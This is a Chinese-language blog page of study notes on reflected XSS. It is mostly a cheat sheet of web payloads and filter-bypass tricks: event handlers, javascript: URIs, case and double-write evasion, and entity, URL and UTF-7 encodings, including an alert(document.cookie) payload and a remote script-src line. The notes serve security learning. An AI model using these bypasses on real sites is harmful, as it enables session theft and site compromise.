<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="alternate" href="/atom.xml" title="zhiliya" type="application/atom+xml">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="反射型XSS  注入后在当前返回的页面中含有xss代码   见框就插，大家应该都明白，找到一个 input 输入框，先输入唯一字符串，然后看源代码里有没有出现，再输入 &lt;&gt;””&#x2F;&amp;() 来看看过滤了哪些字符，根据过滤的字符，来构造 xss**。通常有一些方式可以测试网站是否有正确处理特殊字符：** 最简单&lt;script&gt;12345678&lt;script&gt;a">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS">
<meta property="og:url" content="http://yoursite.com/2019/11/16/2%20XSS/index.html">
<meta property="og:site_name" content="zhiliya">
<meta property="og:description" content="反射型XSS  注入后在当前返回的页面中含有xss代码   见框就插，大家应该都明白，找到一个 input 输入框，先输入唯一字符串，然后看源代码里有没有出现，再输入 &lt;&gt;””&#x2F;&amp;() 来看看过滤了哪些字符，根据过滤的字符，来构造 xss**。通常有一些方式可以测试网站是否有正确处理特殊字符：** 最简单&lt;script&gt;12345678&lt;script&gt;a">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2019/11/16/2%20XSS/1.png">
<meta property="og:image" content="http://yoursite.com/2019/11/16/2%20XSS/clip_image002.jpg">
<meta property="og:image" content="http://yoursite.com/2019/11/16/2%20XSS/image-20200726161933891.png">
<meta property="og:image" content="http://yoursite.com/2019/11/16/2%20XSS/image-20200726162032453.png">
<meta property="og:image" content="http://yoursite.com/2019/11/16/2%20XSS/XSS%E8%84%91%E5%9B%BE.png">
<meta property="article:published_time" content="2019-11-16T02:05:50.000Z">
<meta property="article:modified_time" content="2023-09-22T06:07:19.722Z">
<meta property="article:author" content="zhiliya">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2019/11/16/2%20XSS/1.png">

<link rel="canonical" href="http://yoursite.com/2019/11/16/2%20XSS/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>XSS | zhiliya</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zhiliya</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">欢迎访问我的博客</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/16/2%20XSS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="zhiliya">
      <meta itemprop="description" content="emmmm 感觉没啥好说的">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhiliya">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          XSS
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-16 10:05:50" itemprop="dateCreated datePublished" datetime="2019-11-16T10:05:50+08:00">2019-11-16</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-09-22 14:07:19" itemprop="dateModified" datetime="2023-09-22T14:07:19+08:00">2023-09-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="反射型XSS-注入后在当前返回的页面中含有xss代码"><a href="#反射型XSS-注入后在当前返回的页面中含有xss代码" class="headerlink" title="反射型XSS  注入后在当前返回的页面中含有xss代码"></a>反射型XSS  注入后在当前返回的页面中含有xss代码</h1><img src="/2019/11/16/2%20XSS/1.png" alt="1" style="zoom:150%;">

<p> <strong>见框就插，大家应该都明白，找到一个</strong> <strong>input</strong> <strong>输入框，先输入唯一字符串，然后看源代码里有没有出现，再输入</strong> <strong>&lt;&gt;””/&amp;()</strong> <strong>来看看过滤了哪些字符，根据过滤的字符，来构造</strong> <strong>xss**</strong>。通常有一些方式可以测试网站是否有正确处理特殊字符：**</p>
<h2 id="最简单-lt-script-gt"><a href="#最简单-lt-script-gt" class="headerlink" title="最简单&lt;script&gt;"></a>最简单<code>&lt;script&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="number">1</span>)&lt;<span class="regexp">/script&gt;    不加引号形式     哪些可以过滤的元素str_replace("&lt;script","&lt;scr_ipt",$str)：script &lt; </span></span><br><span class="line"><span class="regexp">&lt;script&gt;alert('xss')&lt;/</span>script&gt;   加引号</span><br><span class="line">&lt;script&gt;alert(<span class="regexp">/xss/</span>)&lt;<span class="regexp">/script&gt;   斜杠    $str2=str_replace("&lt;script","&lt;scr_ipt",$str);</span></span><br><span class="line"><span class="regexp">&lt;script&gt;alert(document.cookie)&lt;/</span>script&gt;</span><br><span class="line">&lt;script&gt;alert(<span class="built_in">document</span>.domain)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp"></span></span><br><span class="line"><span class="regexp">&lt;script&gt;prompt(1);&lt;/</span>script&gt;</span><br><span class="line">&lt;script&gt;confirm(<span class="number">1</span>);<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<p><img src="/2019/11/16/2%20XSS/clip_image002.jpg" alt="img"></p>
<h2 id="使用其他标签弹窗"><a href="#使用其他标签弹窗" class="headerlink" title="使用其他标签弹窗"></a>使用其他标签弹窗</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;a href="</span>javascript:alert(<span class="string">'xss'</span>)<span class="string">"&gt;1&lt;/a&gt;  JavaScript伪协议  $str6=str_replace("</span>href<span class="string">","</span>hr_ef<span class="string">",$str5);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;svg/ onload=alert('xss')&gt;  SVG 是使用 XML 来描述二维图形和绘图程序的语言。</span></span><br><span class="line"><span class="string">&lt;svg onload=confirm``&gt;</span></span><br><span class="line"><span class="string">&lt;body onload=prompt(1);&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">"</span>&gt;<span class="xml"><span class="tag">&lt;<span class="name">img</span> <span class="attr">Src</span>=<span class="string">x</span> <span class="attr">Onerror</span>=<span class="string">alert(1)</span>&gt;</span>      $str4=str_replace("src","sr_c",$str3);</span></span><br><span class="line">&lt;img src='z'  onerror="alert('xss')"&gt;</span><br><span class="line">&lt;img src=# onerror="prompt(1)"&gt;</span><br><span class="line">&lt;img src="javascript:alert('XSS')"&gt;</span><br><span class="line">&lt;img srsrcc=# oonnerror="&amp;#60;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#62;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#120;&amp;#120;&amp;#39;&amp;#41;&amp;#60;&amp;#47;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#62;"&gt;</span><br><span class="line"></span><br><span class="line">这里通过 src 属性去引用一张根本不存在的图片，通过 JS 中的 onerror 事件去触发弹框。同理引用</span><br><span class="line">Video、audio 也是一样。</span><br><span class="line">&lt;video src=test.mp4 onerror=alert(‘1’);&gt;</span><br><span class="line">&lt;audio src=test.mp3 onerror=alert(‘1’);&gt;</span><br><span class="line">    </span><br><span class="line">&lt;img src="1" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))"&gt;</span><br></pre></td></tr></table></figure>

<h2 id="闭合-添加标签内属性-使用鼠标事件on"><a href="#闭合-添加标签内属性-使用鼠标事件on" class="headerlink" title="闭合 添加标签内属性    使用鼠标事件on~"></a>闭合 添加标签内属性    使用鼠标事件<code>on~</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">" onclick="</span>alert(<span class="number">1</span>)<span class="string">"    $str3=str_replace("</span>on<span class="string">","</span>o_n<span class="string">",$str2);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">htmlspecialchars默认配置不过滤单引号，需要设置quotestyle才会进行转义</span></span><br><span class="line"><span class="string">htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。</span></span><br><span class="line"><span class="string">预定义的字符是：</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    &amp; （和号）成为 &amp;</span></span><br><span class="line"><span class="string">    "</span> （双引号）成为 <span class="string">"</span></span><br><span class="line"><span class="string">    ' （单引号）成为 '</span></span><br><span class="line"><span class="string">    &lt; （小于）成为 &lt;</span></span><br><span class="line"><span class="string">    &gt; （大于）成为 &gt;</span></span><br><span class="line"><span class="string">'onclick='window.alert()</span></span><br><span class="line"><span class="string">' onmouseover='alert(1)'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">"</span> onfocus=alert(<span class="number">1</span>) autofocus=<span class="string">"</span></span><br><span class="line"><span class="string">onsubmit="</span>alert(<span class="string">'xss'</span>)<span class="string">"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">"</span> onmouseover=<span class="string">"alert(document.domain)</span></span><br><span class="line"><span class="string">"</span> onmousemove=<span class="string">"alert(document.domain)或</span></span><br><span class="line"><span class="string">"</span> onclick=alert(<span class="built_in">document</span>.domain) id=<span class="string">"a</span></span><br></pre></td></tr></table></figure>

<h2 id="闭合-直接闭合标签"><a href="#闭合-直接闭合标签" class="headerlink" title="闭合  直接闭合标签"></a>闭合  直接闭合标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;script&gt;alert('xss')&lt;/script&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="php代码绕过"><a href="#php代码绕过" class="headerlink" title="php代码绕过"></a>php代码绕过</h2><h4 id="过滤了-lt-script-gt-标签-大小写绕过和双写绕过"><a href="#过滤了-lt-script-gt-标签-大小写绕过和双写绕过" class="headerlink" title="过滤了 &lt;script&gt; 标签  大小写绕过和双写绕过"></a>过滤了 <code>&lt;script&gt;</code> 标签  大小写绕过和双写绕过</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"&gt;&lt;sCript&gt;alert('xss')&lt;/scRipt&gt;    大小写 绕过  $str =strtolower( $_GET["</span>keyword<span class="string">"]); strtolower可使大小写转换无效</span></span><br><span class="line"><span class="string">&lt;scri&lt;script&gt;pt&gt;alert('xss')&lt;/scri&lt;/script&gt;pt&gt;      双写绕过   当替换成空时 $str2=str_replace("</span>script<span class="string">","</span><span class="string">",$str);  				                                                          str2=str_replace("</span>script<span class="string">","</span>scr_ipt<span class="string">",$str);str_replace替换多一个下换线时无效</span></span><br><span class="line"><span class="string">"</span>&gt;<span class="xml"><span class="tag">&lt;<span class="name">scri&amp;#112;t</span>&gt;</span>alert('xss')<span class="tag">&lt;/<span class="name">scri&amp;#112;t</span>&gt;</span>   不行 构造是 &amp;# 加十进制、十六进制 ASCII 码或 unicode 字符编码，而且浏览器解析的时候会先把 html 编码解析再进行渲染。但是有个前提就是必须要在“值”里，比如属性 src 里，但却不能对 src 进行 html 编码。不然浏览器无法正常的渲染。</span></span><br><span class="line"></span><br><span class="line"><span class="xml">" Onclick="alert(1)"</span></span><br><span class="line"><span class="xml">"&gt;<span class="tag">&lt;<span class="name">A</span> <span class="attr">HREF</span>=<span class="string">"javascript:onclick=alert()"</span>&gt;</span>xss大法好<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h4 id="过滤了-lt-和-gt-，替换成-amp-lt-amp-gt-或空格-用on-鼠标事件"><a href="#过滤了-lt-和-gt-，替换成-amp-lt-amp-gt-或空格-用on-鼠标事件" class="headerlink" title="过滤了&lt;和&gt;，替换成&amp;lt;&amp;gt;或空格 用on~鼠标事件"></a>过滤了&lt;和&gt;，替换成<code>&amp;lt;&amp;gt;</code>或空格 用<code>on~</code>鼠标事件</h4><p>用”闭合value 标签</p>
<p>“ onclick=”alert(1)”</p>
<p>或</p>
<p><code>&quot; onfocus=alert(1) autofocus=&quot;</code></p>
<p>或</p>
<p><code>&quot;  onmouseover=alert(document.domain)</code></p>
<p>因为过滤了&lt;&gt;”,HTML实体是不行的，html实体不能让内容逃出来</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">3</span>Cscript%<span class="number">3</span>Ealert(<span class="string">'XSS'</span>)%<span class="number">3</span>C/script%<span class="number">3</span>E</span><br><span class="line">%<span class="number">3</span>Cscript%<span class="number">3</span>Ealert(%<span class="number">22</span>xss%<span class="number">22</span>)%<span class="number">3</span>C/script%<span class="number">3</span>E  过滤了&lt; &gt; <span class="string">'</span></span><br><span class="line"><span class="string">&lt;script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"&gt;  过滤了 &gt; : /</span></span><br></pre></td></tr></table></figure>

<h4 id="同时过滤script-标签和on-用-lt-a-href"><a href="#同时过滤script-标签和on-用-lt-a-href" class="headerlink" title="同时过滤script 标签和on  用&lt;a href"></a>同时过滤<code>script</code> 标签和<code>on</code>  用<code>&lt;a href</code></h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">str_replace(<span class="string">"&lt;script"</span>,<span class="string">"&lt;scr_ipt"</span>,$str); 进行了替换</span><br><span class="line">str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line"></span><br><span class="line"><span class="string">"&gt;&lt;a href="</span>javascript:alert(<span class="string">'xss'</span>)<span class="string">"&gt;1&lt;/a&gt;</span></span><br><span class="line"><span class="string">or</span></span><br><span class="line"><span class="string">"</span>&gt;<span class="xml"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:onclick=alert()"</span>&gt;</span>xss大法好<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span></span><br><span class="line">or</span><br><span class="line"><span class="string">"&gt;&lt;a href="</span>javascript:alert(<span class="built_in">document</span>.domain)<span class="string">"&gt;xss大法好&lt;/a&gt;</span></span><br><span class="line"><span class="string">注意：需要点击返回页面中的超链接才能生成弹窗</span></span><br></pre></td></tr></table></figure>

<h4 id="无法大小写绕过和双写绕过-使用编码绕过-html实体编码"><a href="#无法大小写绕过和双写绕过-使用编码绕过-html实体编码" class="headerlink" title="无法大小写绕过和双写绕过  使用编码绕过  html实体编码"></a>无法大小写绕过和双写绕过  使用编码绕过  html实体编码</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">html实体编码（dec） ascii  javascri&amp;#112;t:alert(1)  &amp;#112;  还有分号不要忘记    javascri&amp;#112;t:alert(xss)错 字符串xss必须加引号</span><br><span class="line">html实体编码（hex）        javascri&amp;#x70;t:alert(1)  &amp;#x70;  </span><br><span class="line">javascri&amp;#112;t:alert(1)/*http://*/           /**/ php注释</span><br><span class="line">javascri&amp;#112;t:alert(1)//http://  可以</span><br><span class="line">javascri&amp;#112;t:alert(1)#http://  不知道为什么不行</span><br><span class="line">构造是 &amp;# 加十进制、十六进制 ASCII 码或 unicode 字符编码，而且浏览器解析的时候会先把 html 编码解析再进行渲染。但是有个前提就是必须要在“值”里，比如属性 src 里，但却不能对 src 进行 html 编码。不然浏览器无法正常的渲染。</span><br><span class="line"></span><br><span class="line">javasc&amp;#114ipt:alert(&amp;#34;http://")</span><br></pre></td></tr></table></figure>

<ul>
<li>此处也可以用两个反单引号` 来绕过对”的过滤。</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javasc&amp;#114;ipt:alert(`http://`)</span><br></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">插入混淆字符，在css中，<span class="comment">/**/</span>是注释字符，除了<span class="comment">/**/</span>外，字符”\”和结束符”\<span class="number">0</span>″也是被忽略的</span><br><span class="line">(<span class="number">1</span>)能绕WAF的不止html实体，unicode编码也行如e -&gt; \<span class="number">0065</span> ，\u0065   ；\<span class="number">0065</span>xpression（这道题过滤了反斜杠，反斜杠零）</span><br><span class="line">(<span class="number">2</span>)在expression中加反斜杠分隔 ；ex\pression（不行，理由同上）</span><br><span class="line">(<span class="number">3</span>)在expression中加注释符<span class="comment">/**/</span>分隔；ex<span class="comment">/**/</span>pression  通过</span><br><span class="line">(<span class="number">4</span>)在expression中加反斜杠零分隔； ex\<span class="number">0</span>pression 通过</span><br><span class="line">expre<span class="comment">/**/</span>ssion(onmouseover=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="built_in">document</span>.domain)&#125;);</span><br><span class="line">expre\<span class="number">0</span>ssion(onmouseover=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="built_in">document</span>.domain)&#125;);</span><br><span class="line">here:expre<span class="comment">/**/</span>ssion(onmouseover=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="built_in">document</span>.domain)&#125;);</span><br><span class="line">here:expre<span class="comment">/**/</span>ssion (<span class="built_in">window</span>.x?<span class="number">0</span>:(alert (<span class="built_in">document</span>.domain),<span class="built_in">window</span>.x=<span class="number">1</span>));</span><br></pre></td></tr></table></figure>

<h4 id="替换了空格-script-使用-0a换行符绕过-0a-0b-0c-0d-回车换行-空格绕过"><a href="#替换了空格-script-使用-0a换行符绕过-0a-0b-0c-0d-回车换行-空格绕过" class="headerlink" title="替换了空格 script /  使用%0a换行符绕过 %0a %0b %0c %0d (回车换行) 空格绕过"></a>替换了空格 script /  使用%0a换行符绕过 %0a %0b %0c %0d (回车换行) 空格绕过</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img%<span class="number">0</span>asrc=x%<span class="number">0</span>aonerror=alert(<span class="number">1</span>)&gt;  </span><br><span class="line">&lt;script&gt;alert(<span class="number">1</span>)&lt;<span class="regexp">/script&gt; 肯定不能用了</span></span><br><span class="line"><span class="regexp">" onclick="alert(1)"  因为是在标签内部也不用</span></span><br></pre></td></tr></table></figure>


<h4 id="过滤了-和"><a href="#过滤了-和" class="headerlink" title="过滤了=和("></a>过滤了=和(</h4><ul>
<li>利用SVG标签</li>
</ul>
<p>该标签会将 XML 实体（转义序列）提前解析再加入标签，从而绕过过滤</p>
<p><code>&lt;svg&gt;&lt;script&gt;prompt&amp;#x28;1)&lt;/script&gt;</code></p>
<ul>
<li>也可以利用 JS 中的 eval 函数</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="built_in">eval</span>.call<span class="string">`<span class="subst">$&#123;<span class="string">'prompt\x281)'</span>&#125;</span>`</span>&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;script&gt;prompt.call`$&#123;1&#125;`&lt;/</span>script&gt;</span><br></pre></td></tr></table></figure>

<h4 id="alert-被过滤"><a href="#alert-被过滤" class="headerlink" title="alert 被过滤"></a>alert 被过滤</h4><ul>
<li>利用 Img 标签和 confirm 函数:</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=# οnerrοr="confirm('xss')"&gt;</span><br><span class="line">or</span><br><span class="line">&lt;img src=# onerror="prompt(1)"&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>或者用 <strong>eval 函数String.fromCharCode 函数</strong>是把输入字符的 unicode 值转化为字符串</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=<span class="string">"1"</span> οnerrοr=<span class="string">"eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))"</span>&gt;</span><br><span class="line">&lt;img src=<span class="string">'z'</span> οnerrοr=<span class="string">"String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)"</span>&gt;</span><br><span class="line">利 用 iframe的src来 弹 窗 </span><br><span class="line">&lt;img src=<span class="string">"1"</span> onerror=<span class="built_in">eval</span>(<span class="string">"\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29"</span>)&gt;<span class="xml"><span class="tag">&lt;/<span class="name">img</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h4 id="iframe"><a href="#iframe" class="headerlink" title="iframe"></a>iframe</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">"javascript:alert(2)"</span>&gt;</span><br><span class="line">如果存在 X-frame 选项，上述 Payload 失效</span><br></pre></td></tr></table></figure>

<h4 id="UTF-7-XSS-【internet-Explorer】"><a href="#UTF-7-XSS-【internet-Explorer】" class="headerlink" title="UTF-7 XSS  【internet Explorer】"></a>UTF-7 XSS  【internet Explorer】</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"  onmouseover="</span>alert(<span class="built_in">document</span>.domain)</span><br><span class="line">+ACIAIAAgAG8-n+AG0Abw-u+AHM-e+AG8Adg-e+AHIAPQBhAGw-e+AHIAdAAo-d+AG8AYw-u+AG0-en+AHQALg-d+AG8AbQBh-<span class="keyword">in</span>+ACk-</span><br><span class="line">并且修改charset为type=text，输入:UTF<span class="number">-7</span></span><br></pre></td></tr></table></figure>

<h4 id="还没被过滤-【internet-Explorer】"><a href="#还没被过滤-【internet-Explorer】" class="headerlink" title="``还没被过滤 `【internet Explorer】"></a>``还没被过滤 `【internet Explorer】</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">``</span>onfocus=alert(<span class="built_in">document</span>.domain)</span><br></pre></td></tr></table></figure>

<h4 id="style-XSS【internet-Explorer】"><a href="#style-XSS【internet-Explorer】" class="headerlink" title="style XSS【internet Explorer】"></a>style XSS【internet Explorer】</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">行内样式的动态特性”(就是在ie下能在css中执行js代码)</span><br><span class="line">在CSS样式中利用expression实现javascript中的onmouseover或onmouseout事件，同样前提是IE</span><br><span class="line">expression(onmouseover=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="built_in">document</span>.domain)&#125;)</span><br><span class="line">&lt;div style=<span class="string">"height:expression(alert('XSS'),1)"</span>&gt;<span class="xml"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span>（这个仅于IE7(含)之前有效）</span><br></pre></td></tr></table></figure>

<h4 id="其他编码"><a href="#其他编码" class="headerlink" title="其他编码"></a>其他编码</h4><h5 id="URL-编码"><a href="#URL-编码" class="headerlink" title="URL 编码"></a>URL 编码</h5><p>URL 只允许用 US-ASCII 字符集中可打印的字符 (0×20—0x7x)，其中某些字符在 HTTP 协议里有特殊的意义，所以有些也不能使用。这里有个需要注意的，+ 加号代表 URL 编码的空格，%20 也是。URL 编码最长见的是在用 GET/POST 传输时，顺序是把字符改成 %+ASCII 两位十六进制 ( 先把字符串转成 ASCII 编码，然后再转成十六进制 )。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print(hex(ord(<span class="string">"Z"</span>)))</span><br></pre></td></tr></table></figure>

<p>这个在编码 DOM XSS 可能会用到</p>
